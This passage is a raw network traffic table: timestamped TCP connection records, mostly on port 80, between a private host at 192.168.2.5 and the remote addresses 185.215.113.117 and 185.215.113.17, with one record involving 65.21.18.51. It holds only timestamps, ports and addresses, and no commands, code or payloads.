Sep 27, 2024 04:21:18.060614109 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.060678959 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.060679913 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.060682058 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.060695887 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.060705900 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.060719013 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.060730934 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.060734034 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.060734034 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.060941935 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.061903954 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.061964989 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.061974049 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.061984062 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.061995029 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.062005997 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.062040091 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.062040091 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.062047005 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.062058926 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.062082052 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.062082052 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.064810991 CEST	45580	49719	65.21.18.51	192.168.2.5
Sep 27, 2024 04:21:18.091942072 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:18.091964960 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:18.091975927 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:18.091986895 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:18.091996908 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:18.092009068 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:18.092016935 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:18.092045069 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:18.092056990 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:18.092092037 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:18.092197895 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:18.092243910 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:18.092300892 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:18.092312098 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:18.092333078 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:18.092344046 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:18.092348099 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:18.092355967 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:18.092365980 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:18.092374086 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:18.092376947 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:18.092386961 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:18.092392921 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:18.092401028 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:18.092411995 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:18.092411995 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:18.092422962 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:18.092432976 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:18.092433929 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:18.092448950 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:18.092473984 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:18.095911980 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.095956087 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.095976114 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.095987082 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.096004963 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.096016884 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.096025944 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.096025944 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.096026897 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.096034050 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.096044064 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.096059084 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.096079111 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.096112013 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.096112013 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.098578930 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.098588943 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.098599911 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.098612070 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.098622084 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.098632097 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.098643064 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.098654032 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.098691940 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.098691940 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.102850914 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.102866888 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.102878094 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.102899075 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.102899075 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.102901936 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.102916956 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.102924109 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.102929115 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.102947950 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.102950096 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.102957010 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.102960110 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.102972031 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.102983952 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.102991104 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.102991104 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.103029966 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.103029966 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.103029966 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.103043079 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.103055000 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.103130102 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.103141069 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.103152037 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.103172064 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.103173018 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.103301048 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.104403019 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.104448080 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.104485035 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.104495049 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.104506016 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.104517937 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.104527950 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.104537964 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.104562044 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.104564905 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.104564905 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.104609013 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.104609013 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.104763985 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.104773998 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.104808092 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.104841948 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.104841948 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.104851961 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.104863882 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.104873896 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.104922056 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.104928017 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.104928017 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.104995966 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.105048895 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.105062008 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.105098963 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.105101109 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.105653048 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.105704069 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.105740070 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.105750084 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.105761051 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.105772972 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.105782986 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.105794907 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.105811119 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.105811119 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.105837107 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.105840921 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.105849028 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.105860949 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.105881929 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.105962992 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.105973959 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.105993032 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.106000900 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.106000900 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.106004000 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.106015921 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.106050014 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.106050014 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.106106997 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.106117964 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.106128931 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.106139898 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.106163979 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.106163979 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.106194973 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.106209993 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.106213093 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.106225014 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.106235027 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.106240988 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.106256008 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.106275082 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.106275082 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.106307983 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.106317997 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.106344938 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.106344938 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.106364012 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.106375933 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.106379032 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.106388092 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.106400013 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.106411934 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.106416941 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.106416941 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.106455088 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.106455088 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.131887913 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.131911993 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.131932974 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.131944895 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.131956100 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.131970882 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.131974936 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.131983042 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.131998062 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.132014990 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.132025957 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.132025957 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.132061005 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.132061005 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.134738922 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.134752035 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.134763956 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.134802103 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.134814978 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.134824038 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.134824038 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.134826899 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.134840965 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.134854078 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.134875059 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.134875059 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.134891987 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.134905100 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.134917021 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.134927988 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.134932041 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.134932041 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.134954929 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.134954929 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.134973049 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.134985924 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.135004997 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.135004997 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.135040998 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.135287046 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.135307074 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.135318995 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.135340929 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.135340929 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.135376930 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.135401964 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.135411978 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.135411978 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.135416031 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.135428905 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.135458946 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.135458946 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.135504007 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.154685020 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.154721975 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.154742956 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.154756069 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.154759884 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.154759884 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.154762030 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.154776096 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.154788971 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.154824972 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.154824972 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.154830933 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.154848099 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.154859066 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.154864073 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.154891014 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.154891014 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.154898882 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.154911995 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.154927015 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.154937029 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.154937029 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.154937029 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.154968023 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.154968023 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.193361998 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.193397999 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.193411112 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.193423986 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.193434954 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.193455935 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.193456888 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.193458080 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.193469048 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.193483114 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.193490982 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.193490982 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.193495989 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.193531990 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.193553925 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.193564892 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.193577051 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.193586111 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.193586111 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.193591118 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.193599939 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.193604946 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.193619013 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.193633080 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.193672895 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.195436954 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.195450068 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.195461988 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.195499897 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.195537090 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.195548058 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.195559025 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.195559978 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.195574045 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.195574999 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.195605040 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.195605040 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.195614100 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.195626020 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.195637941 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.195650101 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.195657015 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.195671082 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.195683002 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.195689917 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.195689917 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.195694923 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.195722103 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.195763111 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.197015047 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.197032928 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.197046041 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.197073936 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.197073936 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.197105885 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.197114944 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.197127104 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.197138071 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.197163105 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.197163105 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.197202921 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.197367907 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.197380066 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.197390079 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.197401047 CEST	80	49725	185.215.113.117	192.168.2.5
